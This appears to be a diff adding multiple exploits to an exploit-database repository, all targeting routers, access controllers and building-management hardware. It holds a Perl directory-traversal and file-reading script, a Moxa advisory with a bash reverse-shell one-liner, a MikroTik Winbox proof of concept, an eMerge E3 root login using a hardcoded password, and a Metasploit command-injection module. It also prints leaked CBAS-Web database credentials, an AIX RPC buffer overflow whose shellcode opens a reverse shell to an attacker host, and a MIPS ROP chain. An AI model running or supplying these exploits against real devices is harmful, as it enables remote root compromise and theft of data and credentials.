49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a";
print $banner;
print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Server: ", $response->header('Server'), "\n";
if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){
print "[ The target is vulnerable\n";
print "[\n[ Directory Traversal\n";
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
print "[ ", $_->attr('href'), "\n" for @files;
my $target = $host."/cgi-bin/getadslattr.cgi";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[\n[ File Reading\n";
print "[ ", $_, "\n" for split(/\n/,$response->content());
} else {
print "[ Exploit failed! The target isn't vulnerable\n";
exit;
}

8299
exploits/hardware/remote/47442.py Executable file
View file

File diff suppressed because it is too large Load diff

67
exploits/hardware/remote/47536.txt Normal file
View file

@ -0,0 +1,67 @@
During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files.
As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsible disclose” them.
The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa.
Many thanks to Moxa and ICS-CERT teams for their help.
Advisory
The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:
CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated.
CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated.
Exploitation
CVE-2019-10969 - Ping Command Injection
The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below:
Ping command injection
Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:
bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1
CVE-2019-10963 - Missing Access Control On Log Files
When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:
http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz
An attacker can retrieve this archive without being authenticated on the Web interface as shown below:
# wget http://192.168.0.1/MOXA_All_LOG.tar.gz
--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz
Connexion à 192.168.0.1:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK
Taille : 15724 (15K) [text/plain]
Sauvegarde en : " MOXA_All_LOG.tar.gz "
MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s
2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724]
# tar ztvf MOXA_All_LOG.tar.gz
drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/
-rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini
-rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini
-rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini
Mitigation
It is recommended to install at least the firmware version 5.3 from Moxa website.
Timeline
2019-02-24: Vendor Disclosure
2019-02-24: Advisory sent to ICS-CERT
2019-09-30: Advisory published by Moxa
2019-10-01: Advisory published by ICS-CERT

310
exploits/hardware/remote/47566.cpp Normal file
View file

@ -0,0 +1,310 @@
# Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning
# Date: 2019-10-30
# Exploit Author: Jacob Baines
# Vendor Homepage: https://mikrotik.com/
# Software Link: https://mikrotik.com/download
# Version: 6.45.6 Stable (and below) or 6.44.5 Long-term (and below)
# Tested on: Various x86 and MIPSBE RouterOS installs
# CVE : CVE-2019-3978
# Writeup: https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
# Disclosure: https://www.tenable.com/security/research/tra-2019-46
# Unauthenticated DNS request via Winbox
# RouterOS before 6.45.7 (stable) and 6.44.6 (Long-term) allowed an unauthenticated remote user trigger DNS requests
# to a user specified DNS server via port 8291 (winbox). The DNS response then gets cached by RouterOS, setting up
# a perfect situation for unauthenticated DNS cache poisoning. This is assigned CVE-2019-3978.
# This PoC takes a target ip/port (router) and a DNS server (e.g. 8.8.8.8).
# The PoC will always send a DNS request for example.com. In the following write up,
# I detail how to use this to poison the routers cache:
# https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
# Note that the writup focuses on router's configured *without* the DNS server enabled.
# Obviously this attack is significantly more powerful when downstream clients use the router as a DNS server.
## What are the build dependencies?
# This requires:
# * Boost 1.66 or higher
# * cmake
## How do I build this jawn?
# Just normal cmake. Try this:
# ```sh
# mkdir build
# cd build
# cmake ..
# make
# ```
# Resolve dependencies as needed.
## Usage Example
# ```sh
# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ./winbox_dns_request -i 192.168.1.50 -p 8291 -s 8.8.8.8
# -> {bff0005:1,u1:134744072,uff0006:1,uff0007:3,s3:'example.com',Uff0001:[14]}
# <- {u4:584628317,uff0003:2,uff0006:1,s3:'example.com',U6:[584628317],U7:[21496],Uff0001:[],Uff0002:[14],S5:['example.com']}
# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ssh admin@192.168.1.50
# ...
# [admin@MikroTik] > ip dns cache print
# Flags: S - static
# # NAME ADDRESS TTL
# 0 example.com 93.184.216.34 5h57m57s
# [admin@MikroTik] >
# ```
# Source:
# https://github.com/tenable/routeros/tree/master/poc/winbox_dns_request
/*
Copyright 2019 Tenable, Inc. *
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
#include <fstream>
#include <cstdlib>
#include <iostream>
#include <boost/cstdint.hpp>
#include <boost/program_options.hpp>
#include <boost/algorithm/string.hpp>
#include "winbox_session.hpp"
#include "winbox_message.hpp"
namespace
{
const char s_version[] = "CVE-2019-3943 PoC Using SNMP dlopen";
bool parseCommandLine(int p_argCount, const char* p_argArray[],
std::string& p_username, std::string& p_password,
std::string& p_ip, std::string& p_port)
{
boost::program_options::options_description description("options");
description.add_options()
("help,h", "A list of command line options")
("version,v", "Display version information")
("username,u", boost::program_options::value<std::string>(), "The user to log in as")
("password", boost::program_options::value<std::string>(), "The password to log in with")
("port,p", boost::program_options::value<std::string>()->default_value("8291"), "The Winbox port to connect to")
("ip,i", boost::program_options::value<std::string>(), "The IPv4 address to connect to");
boost::program_options::variables_map argv_map;
try
{
boost::program_options::store(
boost::program_options::parse_command_line(
p_argCount, p_argArray, description), argv_map);
}
catch (const std::exception& e)
{
std::cerr << e.what() << "\n" << std::endl;
std::cerr << description << std::endl;
return false;
}
boost::program_options::notify(argv_map);
if (argv_map.empty() || argv_map.count("help"))
{
std::cerr << description << std::endl;
return false;
}
if (argv_map.count("version"))
{
std::cerr << "Version: " << ::s_version << std::endl;
return false;
}
if (argv_map.count("username") && argv_map.count("ip") &
argv_map.count("port"))
{
p_username.assign(argv_map["username"].as<std::string>());
p_ip.assign(argv_map["ip"].as<std::string>());
p_port.assign(argv_map["port"].as<std::string>());
if (argv_map.count("password"))
{
p_password.assign(argv_map["password"].as<std::string>());
}
else
{
p_password.assign("");
}
return true;
}
else
{
std::cerr << description << std::endl;
}
return false;
}
}
int main(int p_argc, const char** p_argv)
{
std::string username;
std::string password;
std::string ip;
std::string port;
if (!parseCommandLine(p_argc, p_argv, username, password, ip, port))
{
return EXIT_FAILURE;
}
Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host" << std::endl;
return EXIT_FAILURE;
}
boost::uint32_t p_session_id = 0;
if (!winboxSession.login(username, password, p_session_id))
{
std::cerr << "[-] Login failed." << std::endl;
return false;
}
WinboxMessage msg;
msg.set_to(0x4c);
msg.set_command(0xa0065);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.add_u32(5,80); // height
msg.add_u32(6,24); // width
msg.add_u32(8,1); // controls method. 0 (nova/bin/login), 1 (telnet), 2 (ssh), 3 (mactel), 4 (nova/bin/telser), default...
msg.add_string(0x0a, username); //username
msg.add_string(1,"");
msg.add_string(7, "vt102");
msg.add_string(9, "-l a"); // drop into telnet client shell
winboxSession.send(msg);
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
if (msg.has_error())
{
std::cout << "error: " << msg.get_error_string() << std::endl;
}
boost::uint32_t session_id = msg.get_u32(0xfe0001);
msg.reset();
msg.set_to(0x4c);
msg.set_command(0xa0068);
msg.set_request_id(2);
msg.set_reply_expected(true);
msg.add_u32(5,82);
msg.add_u32(6,24);
msg.add_u32(0xfe0001, session_id);
winboxSession.send(msg);
boost::uint32_t tracker = 0;
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
msg.reset();
msg.set_to(0x4c);
msg.set_command(0xa0067);
msg.set_request_id(3);
msg.set_reply_expected(true);
msg.add_u32(3, tracker);
msg.add_u32(0xfe0001, session_id);
winboxSession.send(msg);
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
if (msg.has_error())
{
std::cout << msg.serialize_to_json() << std::endl;
std::cout << "error: " << msg.get_error_string() << std::endl;
return EXIT_FAILURE;
}
else if (!msg.get_raw(0x02).empty())
{
std::string raw_payload(msg.get_raw(0x02));
tracker += raw_payload.size();
}
//{u3:1047,ufe0001:0,uff0007:655463,r2:[115],Uff0001:[76],Uff0002:[0,456]}
msg.reset();
msg.set_to(0x4c);
msg.set_command(0xa0067);
msg.set_request_id(4);
msg.set_reply_expected(true);
msg.add_u32(3, tracker);
msg.add_u32(0xfe0001, session_id);
msg.add_raw(2, "set tracefile /pckg/option\n");
winboxSession.send(msg);
bool found_telnet_prompt = false;
while (!found_telnet_prompt)
{
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
if (msg.has_error())
{
std::cout << msg.serialize_to_json() << std::endl;
std::cout << "error: " << msg.get_error_string() << std::endl;
return EXIT_FAILURE;
}
else if (!msg.get_raw(0x02).empty())
{
std::string raw_payload(msg.get_raw(0x02));
if (raw_payload.find("telnet> ") != std::string::npos)
{
std::cout << "Success!" << std::endl;
found_telnet_prompt = true;
}
}
}
return EXIT_SUCCESS;
}

48
exploits/hardware/remote/47625.py Executable file
View file

@ -0,0 +1,48 @@
# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 4.6.07
# Tested on: NA
# CVE : CVE-2019-7265
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
#!/usr/bin/env python
#
# ====
# python lineare3_sshroot.py 192.168.1.2
# [+] Connecting to 192.168.1.2 on port 22: Done
# [!] Only Linux is supported for ASLR checks.
# [*] root@192.168.1.2:
# Distro Unknown Unknown
# OS: Unknown
# Arch: Unknown
# Version: 0.0.0
# ASLR: Disabled
# Note: Susceptible to ASLR ulimit trick (CVE-2016-3672)
# [+] Opening new channel: 'shell': Done
# [*] Switching to interactive mode
# Last login: Fri Nov 1 04:21:44 2019 from 192.168.2.17
# root@imx6slevk:~# id
# uid=0(root) gid=0(root) groups=0(root)
# root@imx6slevk:~# pwd
# /home/root
# root@imx6slevk:~# exit
# logout
# [*] Got EOF while reading in interactive
# [*] Closed SSH channel with 192.168.1.2
# ====
from pwn import *
if len(sys.argv) < 2:
print 'Usage: ./e3.py <ip>\n'
sys.exit()
ip = sys.argv[1]
rshell = ssh('root', ip, password='davestyle', port=22)
rshell.interactive()

95
exploits/hardware/remote/47626.rb Executable file
View file

@ -0,0 +1,95 @@
# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 4.6.07
# Tested on: NA
# CVE : CVE-2019-7265
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Tested on: GNU/Linux 3.14.54 (ARMv7 rev 10), Lighttpd 1.4.40, PHP/5.6.23
#
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Linear eMerge E3 Access Controller Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in the Linear eMerge
E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
function allowing arbitrary command execution with root privileges.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gjoko Krstic <gjoko@applied-risk.com> ' # Discovery, Exploit, MSF Module
],
'References' =>
[
[ 'URL', 'https://applied-risk.com/labs/advisories' ],
[ 'URL', 'https://www.nortekcontrol.com' ],
[ 'CVE', '2019-7256']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [ ['Linear eMerge E3', { }], ],
'DisclosureDate' => "Oct 29 2019",
'DefaultTarget' => 0
)
)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "card_scan_decoder.php"),
'vars_get' =>
{
'No' => '251',
'door' => '1337'
}
})
if res.code == 200 and res.to_s =~ /PHP\/5.6.23/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s, "card_scan_decoder.php")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'No' => '251',
'door' => "`"+cmd+"`"
}
})
unless res
fail_with(Failure::Unknown, 'Exploit failed!')
end
res
end
def exploit
http_send_command(payload.encoded)
print_status("Sending #{payload.encoded.length} byte payload...")
end
end

20
exploits/hardware/remote/47629.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: CBAS-Web 19.0.0 - Information Disclosure
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10849
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl
openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz
$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password"
#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
# mysql -u root --password="souper secrit" -e "describe $i" wadb;
mysql -u root --password="souper secrit" $DB < $filename.sql
$MYSQL -u root --password="souper secrit" -e "$SQL"

256
exploits/hardware/remote/47888.py Executable file
View file

@ -0,0 +1,256 @@
# Exploit Title: EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow
# Date: 2018-09-19
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.ibm.com/us-en/
# Version: 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, 7200-01-01-1642
# Tested on: IBM AIX PPC
# CVE: CVE-2017-3623
# EBBISLAND / EBBSHAVE RPC Buffer Overflow for IBM AIX PPC
#!/usr/bin/python
# Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc
# Exploit code example; shellcode requires /usr/bin/bash on the target
# Example values for my AIX 7.2 LPAR:
# gid_base: 3007d390
# execl_func: d0307940
# execl_toc: f081bc20
# CAUTION: If a RPC service repeatedly crashes, it can be automatically disabled
from os import urandom
from socket import socket, AF_INET, SOCK_STREAM
from struct import pack, unpack
from sys import argv, exit
from time import time, sleep
def getCredLoopbackBody():
global gid_base, rhost, lhost, lport, gid_base, execl_func, execl_toc
epoch = pack('>I', time()) # Make sure the system clock is in sync w/ target
# Doesn't matter, ljust call assumes len <= 4
node_name = 'hn'
node_length = pack('>I', len(node_name))
node_name = node_name.ljust(4, '\x00')
# Also doesn't matter
uid = pack('>I', 0)
gid = pack('>I', 0)
# Big enough to trigger an overflow
# Not big enough to trigger defensive code
# You could make this a little bit less,
# but you'd have to tweak the part 2 code
gids_len = pack('>I', 64)
base_addr = pack('>I', gid_base)
addr_8c = pack('>I', gid_base + 0x8c)
addr_a8 = pack('>I', gid_base + 0xa8)
addr_4c = pack('>I', gid_base + 0x4c)
func_addr = pack('>I', execl_func)
toc_addr = pack('>I', execl_toc)
cmd = 'bash -i >& /dev/tcp/' + lhost + '/' + lport + ' 0>&1'
cmd = cmd.ljust(0x30, '\x00')
# Each GID is 4 bytes long, we want 64
gids = (
# +0x0 # filepath
'/usr/bin/bash\x00\x00\x00'
# +0x10 # argv[0]
'bash\x00\x00\x00\x00'
# +0x18 # argv[1]
'-c\x00\x00'
# +0x1c # argv[2]
) + cmd + (
# +0x4c # r3 = filepath
'\x70\x63\x00\x00' # andi. r3, r3, 0x0
'\x3c\x60'
) + base_addr[0:2] + ( # lis r3, ...
'\x60\x63'
) + base_addr[2:4] + ( # ori r3, r3, ...
# +0x58 # r4 = argv[0]
'\x38\x83\x00\x10' # addi r4, r3, 0x10
# +0x5c # r5 = argv[1]
'\x38\xa4\x00\x08' # addi r5, r4, 0x8
# +0x60 # r6 = argv[2]
'\x38\xc5\x00\x04' # addi r6, r5, 0x4
# +0x64 # r7 = NULL
'\x70\xe7\x00\x00' # andi. r7, r7, 0x0
# +0x68 # r2 = libc.a TOC for execl
'\x70\x42\x00\x00' # andi. r2, r2, 0x0
'\x3c\x40'
) + toc_addr[0:2] + ( # lis r2, ...
'\x60\x42'
) + toc_addr[2:4] + ( # ori r2, r2, ...
# +0x74 # execl
'\x71\x08\x00\x00' # andi. r8, r8, 0x0
'\x3d\x00'
) + func_addr[0:2] + ( # lis r8, ...
'\x61\x08'
) + func_addr[2:4] + ( # ori r8, ...
'\x7d\x09\x03\xa6' # mtctr r8
'\x4e\x80\x04\x21' # bctrl
# +0x88 # 0x14 padding
'AAAAAAAAAAAAAAAAAAAA'
# +0x9c # Will be NULL
'ZZZZ'
# +0xa0
# @+948: r5 = +0x8c
# @+968: r5 = *(+0x8c + 0x18) = *(+0xa4)
# +0xa4
# @+968: r5 = +0xa8
# @+972: r0 = *(r5 + 0x0) = *(+0xa8)
# +0xa8
# @+972: r0 = +0x4c
# @+980: ctr = r0 = +0x4c
# @+988: branch to ctr
) + addr_8c + addr_a8 + addr_4c + (
# +0xac # padding
'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'
)
print ":".join("{:02x}".format(ord(c)) for c in gids)
print len(gids)
return epoch + node_length + node_name + uid + gid + gids_len + gids
def getCredLoopback():
cred_flavor = pack('>I', 0x55de) # AUTH_LOOPBACK
cred_body = getCredLoopbackBody()
cred_len = pack('>I', len(cred_body))
return cred_flavor + cred_len + cred_body
def getAuthNone():
auth_flavor = pack('>I', 0) # AUTH_NONE
auth_len = pack('>I', 0)
return auth_flavor + auth_len
def getMessage(prog_num, ver_num, proc_num, use_loopback_cred):
xid = urandom(4)
mtype = pack('>I', 0) # CALL
rpcvers = pack('>I', 2)
prog = pack('>I', prog_num)
vers = pack('>I', ver_num)
proc = pack('>I', proc_num)
cred = ( getCredLoopback() if use_loopback_cred else getAuthNone() )
verf = getAuthNone()
return xid + mtype + rpcvers + prog + vers + proc + cred + verf
def getPacket(message):
# MSB on = this is the last fragment
# LSBs = fragment length
frag = pack('>I', len(message) + 0x80000000)
return frag + message
if len(argv) < 7:
print 'Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc'
exit(1)
rhost = argv[1]
lhost = argv[2]
lport = argv[3]
gid_base = int(argv[4], 16)
execl_func = int(argv[5], 16)
execl_toc = int(argv[6], 16)
# Query the portmapper for services
services = []
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, 111)) # port 111 for portmapper
s.send(getPacket(getMessage(
100000, # portmapper
2, # version 2
4, # DUMP
False # unauth request
)))
s.recv(0x1c) # skip over fragment length, XID, message type, reply state, verifier, accept state
while list(unpack('>I', s.recv(4)))[0]: # while next "value follows" field is true
prog_num, ver_num, proto_num, port = unpack('>IIII', s.recv(16))
if (prog_num == 100024 # status
and proto_num == 6): # TCP
print '[ ] Found service ' + str(prog_num) + ' v' + str(ver_num) + ' on TCP port ' + str(port)
services.append((prog_num, ver_num, port))
s.close()
# Try attacking
for service in services:
prog_num, ver_num, port = service
serv_str = str(prog_num) + ' v' + str(ver_num)
for attack in [False, True]:
sleep(1) # be gentle
print '[ ] ' + ( 'Attacking' if attack else 'Pinging' ) + ' ' + serv_str
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, port))
resp_len = 0
s.send(getPacket(getMessage(
prog_num,
ver_num,
0, # NULL, acts like a ping
attack
)))
s.settimeout(5) # give inetd/... a chance to spin up the service if needed
try:
resp_len = len( s.recv(1024) ) # try to receive up to 1024 bytes
except:
resp_len = 0 # typically either timeout, connection error, or Ctrl+C
try:
s.close() # try closing the connection if it isn't already dead
except:
pass # connection is probably already dead
print '[ ] Got response length ' + str(resp_len)
if resp_len == 0: # suspect the service either timed out or crashed
if attack:
print '[+] Probably vulnerable to EBBSHAVE, hopefully you have a shell'
else:
print '[-] Service probably down or otherwise misbehaving, skipping...'
break

431
exploits/hardware/remote/47936.js Normal file
View file

@ -0,0 +1,431 @@
// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47936.zip
function buf2hex(buffer) { // buffer is an ArrayBuffer
return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join('');
}
function insertAt(arr, index, toInsert) {
for(let i = 0; i < toInsert.length; i++) {
arr[i+index]= toInsert[i];
}
}
function testEqual(buf1, buf2)
{
if (buf1.byteLength != buf2.byteLength) return false;
var dv1 = new Int8Array(buf1);
var dv2 = new Int8Array(buf2);
for (var i = 0 ; i != buf1.byteLength ; i++)
{
if (dv1[i] != dv2[i]) return false;
}
return true;
}
arr = new Uint8Array(0xd00);
arr.fill(0x41)
firstSp = 0x00
previousSp = firstSp
sp = previousSp+0xa0
insertAt(arr, previousSp+0x84-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
insertAt(arr, previousSp+0x94-1, [0xf2, 0x80, 0x80, 0xa8, 0x64])
// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
previousSp = sp
sp = previousSp+0x20
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54])
//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x14, 0x27, 0x10])
//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x8a, 0x89, 0x7c])
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
//call Socket
//0x80a05b20
socketAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x20]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddr) //set s0 = socketAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
